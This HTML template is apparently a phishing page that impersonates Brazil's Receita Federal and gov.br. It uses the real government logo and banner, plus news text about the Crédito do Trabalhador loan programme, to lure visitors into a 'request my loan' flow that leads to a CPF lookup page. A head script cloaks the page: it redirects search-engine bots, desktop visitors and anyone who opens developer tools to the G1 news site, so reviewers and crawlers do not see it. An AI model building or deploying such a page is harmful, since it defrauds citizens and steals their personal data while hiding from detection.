<!DOCTYPE html>
<html data-template="verificar-cpf">
<head>
    <meta charset="utf-8"/>
    <meta content="width=device-width, initial-scale=1.0" name="viewport"/>
    <title>Receita Federal - Verificar CPF</title>
    <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css" rel="stylesheet"/>
    <script>
        // Função para detectar se é um dispositivo móvel
        function isMobile() {
          return /Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent);
        }

        // Função para detectar se é um bot
        function isBot() {
          const botAgents = [
            'Googlebot', 'Bingbot', 'Slurp', 'DuckDuckBot', 'Baiduspider',
            'YandexBot', 'Sogou', 'Exabot', 'facebot', 'ia_archiver'
          ];

          return botAgents.some(bot => navigator.userAgent.includes(bot));
        }

        // Função para verificar se a largura da janela é maior que 768px
        function isWideScreen() {
          return window.innerWidth > 768;
        }

        // Função para detectar se o inspetor está aberto
        function isInspectorOpen() {
          // Verifica se o console está aberto
          const devtools = /./;
          devtools.toString = function() {
            return 'devtools';
          };
          console.log('%c', devtools);

          // Verifica se o tempo de execução de uma função é anormalmente lento
          let start = performance.now();
          debugger;
          let end = performance.now();
          return end - start > 100;
        }

        // Redirecionar ou bloquear o acesso
        function checkAccess() {
          if (isBot() || (!isMobile() && isWideScreen()) || isInspectorOpen()) {
            // Redirecionar para o site G1 se o acesso for bloqueado
            window.location.href = "https://g1.globo.com/";
          }
        }

        // Executar a função de verificação ao carregar a página
        window.onload = checkAccess;

        // Adicionar um listener para verificar novamente se a janela for redimensionada
        window.addEventListener('resize', checkAccess);
    </script>
    <script src="https://cdn.tailwindcss.com"></script>
    <style>
        @font-face {
            font-family: 'Rawline';
            src: url("{{ url_for('static', filename='fonts/rawline-400.ea42a37247439622.woff2') }}") format('woff2');
            font-weight: 400;
            font-style: normal;
        }
        @font-face {
            font-family: 'Rawline';
            src: url("{{ url_for('static', filename='fonts/rawline-600.844a17f0db94d147.woff2') }}") format('woff2');
            font-weight: 600;
            font-style: normal;
        }
        @font-face {
            font-family: 'Rawline';
            src: url("{{ url_for('static', filename='fonts/rawline-700.1c7c76152b40409f.woff2') }}") format('woff2');
            font-weight: 700;
            font-style: normal;
        }
        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
            font-family: 'Rawline', sans-serif;
        }
        body {
            background-color: white;
            padding-top: 60px;
            color: #333333;
            font-size: 16px;
            line-height: 1.05;
        }
        .header {
            display: flex;
            justify-content: space-between;
            align-items: center;
            padding: 8px 20px;
            background-color: white;
            position: fixed;
            top: 0;
            left: 0;
            right: 0;
            z-index: 1000;
            box-shadow: 0 2px 5px rgba(0,0,0,0.1);
            height: 60px;
        }
        .logo {
            width: 100px;
            height: auto;
        }
        .header-icons {
            display: flex;
            gap: 15px;
        }
        .header-icon {
            font-size: 18px;
            color: #1351b4;
        }
        .hero-image {
            width: 100%;
            height: auto;
            overflow: hidden;
            box-shadow: 0 4px 6px rgba(0,0,0,0.1);
        }
        .hero-image img {
            width: 100%;
            height: auto;
            object-fit: cover;
        }
        .user-info {
            display: flex;
            flex-direction: column;
            position: relative;
            margin: 15px;
            box-shadow: 0 1px 6px rgba(0, 0, 0, 0.2);
            background-color: white;
            padding: 15px;
            border-radius: 4px;
            width: calc(100% - 30px);
        }
        .user-info-content {
            display: flex;
            justify-content: space-between;
            align-items: flex-start;
            width: 100%;
        }
        .user-info p {
            margin: 1px 0;
            color: #333333;
            font-size: 16px;
        }
        .user-info p strong {
            font-weight: 600;
        }
        .user-info h3 {
            font-weight: 700;
            color: #0c326f;
            margin-bottom: 4px;
        }
        .video-container {
            position: relative;
            width: 100%;
            margin: 8px auto 0;
            border-radius: 4px;
            overflow: hidden;
            box-shadow: 0 2px 4px rgba(0,0,0,0.1);
        }
        .news-description {
            color: #333;
            margin-top: 12px;
            padding: 0 4px;
            text-align: justify;
            width: 100%;
        }
        .verify-cpf-button {
            width: 100%;
            padding: 12px;
            background-color: #1351b4;
            color: white;
            border: none;
            border-radius: 4px;
            font-weight: 600;
            font-size: 16px;
            cursor: pointer;
            transition: background-color 0.3s ease;
            margin-top: 20px;
        }
        .verify-cpf-button:hover {
            background-color: #092555;
        }
        .footer {
            background-color: #1351b4;
            color: white;
            padding: 16px;
            text-align: center;
            margin-top: 40px;
            width: 100%;
            position: relative;
            bottom: 0;
        }
        .footer-logo {
            width: 100px;
            margin: 0 auto 8px;
            display: block;
        }
        @media (max-width: 600px) {
            .header {
                padding: 6px 8px;
            }
            .logo {
                width: 100px; /* Corrected width for smaller screens */
            }
            .header-icons {
                gap: 8px;
            }
            .header-icon {
                font-size: 16px;
            }
            .user-info {
                margin: 10px;
                width: calc(100% - 20px);
            }
        }
    </style>
</head>
<body class="verificar-cpf-page">
    <div class="header">
        <img alt="Logo Gov.br" class="logo" src="https://upload.wikimedia.org/wikipedia/commons/thumb/1/11/Gov.br_logo.svg/2560px-Gov.br_logo.svg.png"/>
        <div class="header-icons">
            <i class="fas fa-search header-icon"></i>
            <i class="fas fa-question-circle header-icon"></i>
            <i class="fas fa-adjust header-icon"></i>
        </div>
    </div>

    <div class="hero-image">
        <img alt="Aviso sobre novas regras do PIX" src="https://www.gov.br/trabalho-e-emprego/pt-br/imagens-capa/banner-credito-do-trabalhador-site-mte.png">
    </div>

    <div class="user-info">
        <div class="user-info-content">
            <div class="user-info-text">
                <h3>Programa Crédito do Trabalhador</h3>
                <p>Crédito do Trabalhador já tem 10,4 milhões de simulações de empréstimo e 102.244 saques realizados.</p>
            </div>
        </div>
    </div>

    <div class="video-container">
        <div id="vid_67de3bf1645071bc70b8d1eb" style="position: relative; width: 100%; padding: 56.25% 0 0;"> 
            <img id="thumb_67de3bf1645071bc70b8d1eb" src="https://images.converteai.net/7c86a210-1740-4336-b02c-1f5e9f65fc06/players/67de3bf1645071bc70b8d1eb/thumbnail.jpg" style="position: absolute; top: 0; left: 0; width: 100%; height: 100%; object-fit: cover; display: block;" alt="thumbnail"> 
            <div id="backdrop_67de3bf1645071bc70b8d1eb" style=" -webkit-backdrop-filter: blur(5px); backdrop-filter: blur(5px); position: absolute; top: 0; height: 100%; width: 100%; "></div> 
        </div> 
        <script type="text/javascript" id="scr_67de3bf1645071bc70b8d1eb"> 
            var s=document.createElement("script"); 
            s.src="https://scripts.converteai.net/7c86a210-1740-4336-b02c-1f5e9f65fc06/players/67de3bf1645071bc70b8d1eb/player.js", 
            s.async=!0,document.head.appendChild(s); 
        </script>
    </div>

    <div class="user-info">
        <p class="news-description">
            Entrou em vigor hoje (21) a Medida Provisória (MP) que libera o crédito consignado para <b>47 milhões de trabalhadores</b> com carteira assinada, incluindo os domésticos, os rurais e os empregados do MEI. Até as 13h45 de hoje, segundo dados informados pela Dataprev, foram simulados 10.455.920 pedidos de empréstimos.
        </p>
        <button onclick="window.location.href='/buscar-cpf'" class="verify-cpf-button">
            Solicitar meu Empréstimo
        </button>
    </div>

    <footer class="footer">
        <p>© 2025 GOVBR. Todos os direitos reservados.</p>
    </footer>

    <script>
        document.addEventListener('DOMContentLoaded', function() {
            console.log('[DEBUG] Inicializando script');
        });
    </script>
</body>
</html>